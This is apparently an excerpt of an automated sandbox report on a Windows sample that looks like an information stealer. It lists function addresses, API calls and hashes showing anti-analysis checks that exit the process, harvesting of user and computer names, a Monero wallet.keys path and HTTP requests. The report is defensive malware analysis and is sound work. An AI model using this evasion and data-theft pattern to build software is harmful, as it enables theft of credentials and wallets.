                                  control_flow_graph 1356 247500-24754a GetWindowsDirectoryA 1357 247553-2475c7 GetVolumeInformationA call 248d00 * 3 1356->1357 1358 24754c 1356->1358 1365 2475d8-2475df 1357->1365 1358->1357 1366 2475e1-2475fa call 248d00 1365->1366 1367 2475fc-247617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 247628-247658 wsprintfA call 24a740 1367->1369 1370 247619-247626 call 24a740 1367->1370 1377 24767e-24768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00247542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0024760A
                                  • wsprintfA.USER32 ref: 00247640
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$%
                                  • API String ID: 1544550907-3643170776
                                  • Opcode ID: 546a8c9df6a655f2cd028147a692112ecde2ebd4b948a4609bfc3a64f086dbca
                                  • Instruction ID: 991e5ea4d2a02669079440d21865b993cae5cf26575e831c776193f10308ddad
                                  • Opcode Fuzzy Hash: 546a8c9df6a655f2cd028147a692112ecde2ebd4b948a4609bfc3a64f086dbca
                                  • Instruction Fuzzy Hash: A541A2B1D14248EBDB14DFA4DC45BEEBBB8EF48704F100098F5096B280D774AA94CFA5
                                  Function 002469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010416E0), ref: 002498A1
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010416F8), ref: 002498BA
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041500), ref: 002498D2
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041710), ref: 002498EA
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041728), ref: 00249903
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010488F8), ref: 0024991B
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01035048), ref: 00249933
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01034FA8), ref: 0024994C
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010415F0), ref: 00249964
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041608), ref: 0024997C
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010417A0), ref: 00249995
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041518), ref: 002499AD
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010351E8), ref: 002499C5
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041620), ref: 002499DE
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 002311D0: ExitProcess.KERNEL32 ref: 00231211
                                    • Part of subcall function 00231160: GetSystemInfo.KERNEL32(?), ref: 0023116A
                                    • Part of subcall function 00231160: ExitProcess.KERNEL32 ref: 0023117E
                                    • Part of subcall function 00231110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0023112B
                                    • Part of subcall function 00231110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00231132
                                    • Part of subcall function 00231110: ExitProcess.KERNEL32 ref: 00231143
                                    • Part of subcall function 00231220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0023123E
                                    • Part of subcall function 00231220: ExitProcess.KERNEL32 ref: 00231294
                                    • Part of subcall function 00246770: GetUserDefaultLangID.KERNEL32 ref: 00246774
                                    • Part of subcall function 00231190: ExitProcess.KERNEL32 ref: 002311C6
                                    • Part of subcall function 00247850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                    • Part of subcall function 00247850: RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                    • Part of subcall function 00247850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                    • Part of subcall function 002478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                    • Part of subcall function 002478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                    • Part of subcall function 002478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00246AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00246AF9
                                  • Sleep.KERNEL32(00001770), ref: 00246B04
                                  • CloseHandle.KERNEL32(?,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246B1A
                                  • ExitProcess.KERNEL32 ref: 00246B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: af655c440b0705a4ced4a627cbcdf8bd5db4af77e5b7767efd05d1576e3d05d6
                                  • Instruction ID: adf5245d440e981c98a61f8204ebd48f95d75775edff2c2c052db3d354ce9036
                                  • Opcode Fuzzy Hash: af655c440b0705a4ced4a627cbcdf8bd5db4af77e5b7767efd05d1576e3d05d6
                                  • Instruction Fuzzy Hash: 30313C71960208AAEB0CFBF0DC57BEE7778EF44301F004528F616A2182DF706965CEA6
                                  Function 00246AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 246af3 1437 246b0a 1436->1437 1439 246b0c-246b22 call 246920 call 245b10 CloseHandle ExitProcess 1437->1439 1440 246aba-246ad7 call 24aad0 OpenEventA 1437->1440 1446 246af5-246b04 CloseHandle Sleep 1440->1446 1447 246ad9-246af1 call 24aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00246AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00246AF9
                                  • Sleep.KERNEL32(00001770), ref: 00246B04
                                  • CloseHandle.KERNEL32(?,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246B1A
                                  • ExitProcess.KERNEL32 ref: 00246B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 8456a4e18e79cebfec8c5c714d0917f662959655904fbf8700d1df4cf7959ed6
                                  • Instruction ID: f78a78dc200d485bfcd99a50e52a62076f016218b184736029381a8e1d315dcd
                                  • Opcode Fuzzy Hash: 8456a4e18e79cebfec8c5c714d0917f662959655904fbf8700d1df4cf7959ed6
                                  • Instruction Fuzzy Hash: 28F05E7096022AAFE708ABA0DC0EBBD7B74FB05705F104924F517A51C1CBF055A0DE5B
                                  Function 002347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: b95c12a7d1c28fd1a948e4010befbffc732fd5e597ede89853da9b1b25ed7010
                                  • Instruction ID: a60ce784771e371ceebde1909e64bd69d11670587090c35ff69e34abf52f2ed2
                                  • Opcode Fuzzy Hash: b95c12a7d1c28fd1a948e4010befbffc732fd5e597ede89853da9b1b25ed7010
                                  • Instruction Fuzzy Hash: 58211DB1D00208ABDF14DFA4E946ADD7B79FB45320F108225F965A72D0DB706A19CF92
                                  Function 002451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 00236280: InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                    • Part of subcall function 00236280: StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                    • Part of subcall function 00236280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                    • Part of subcall function 00236280: HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                    • Part of subcall function 00236280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                    • Part of subcall function 00236280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: d718c5798aa0358f26b98c7949a65968fece7338de14366666f3f00379755e49
                                  • Instruction ID: b2e38633c4a0558da04a069a0a4f36d3b6664e39f705a05990ddfef4844cd48f
                                  • Opcode Fuzzy Hash: d718c5798aa0358f26b98c7949a65968fece7338de14366666f3f00379755e49
                                  • Instruction Fuzzy Hash: 9E11EC70964148ABEB18FF64DD52AED7378AF50300F804558FC1A5A592EF70AB25CE92
                                  Function 00231220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1493 231220-231247 call 2489b0 GlobalMemoryStatusEx 1496 231273-23127a 1493->1496 1497 231249-231271 call 24da00 * 2 1493->1497 1499 231281-231285 1496->1499 1497->1499 1501 231287 1499->1501 1502 23129a-23129d 1499->1502 1504 231292-231294 ExitProcess 1501->1504 1505 231289-231290 1501->1505 1505->1502 1505->1504
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0023123E
                                  • ExitProcess.KERNEL32 ref: 00231294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 15145c1880699906b4e578ed71df75b6e0ef48ecdb5671153f81c5dc14713a32
                                  • Instruction ID: 5ff28b838dcdaca2d9b36f53fd4e2a6d5273bbd117411d55a324995efbcbe4ad
                                  • Opcode Fuzzy Hash: 15145c1880699906b4e578ed71df75b6e0ef48ecdb5671153f81c5dc14713a32
                                  • Instruction Fuzzy Hash: 45016DF0D60318BAEB14EFE0CC49B9EBB78AB04705F208058EB05B62C0D7B495718B99
                                  Function 002478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a82f83802ffa7e63a83335535d446ba1c2a8695cc8558afef0502a4c398b9320
                                  • Instruction ID: 311d774491fe1a974f3399549fbc82554c169666d95766247201b56528c9fc34
                                  • Opcode Fuzzy Hash: a82f83802ffa7e63a83335535d446ba1c2a8695cc8558afef0502a4c398b9320
                                  • Instruction Fuzzy Hash: 0E01A9B1A14205EFC704DF94DD45BAEBBB8F744B11F104269FA55E3380D37459548BA2
                                  Function 00231110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0023112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00231132
                                  • ExitProcess.KERNEL32 ref: 00231143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 77204e57b95509c69902018ffcca165a49ae80065b8f849754408039296cf97c
                                  • Instruction ID: 5007af61fa2fe576da6f463bc2a77f43da1c3ba5d75d21a3d605971baa9e5b73
                                  • Opcode Fuzzy Hash: 77204e57b95509c69902018ffcca165a49ae80065b8f849754408039296cf97c
                                  • Instruction Fuzzy Hash: 3AE0E6B0A55308FBE7146BA09D0AB4D7678AB44B02F104054F70D761D0D6B566619A9E
                                  Function 002310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002310B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002310F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
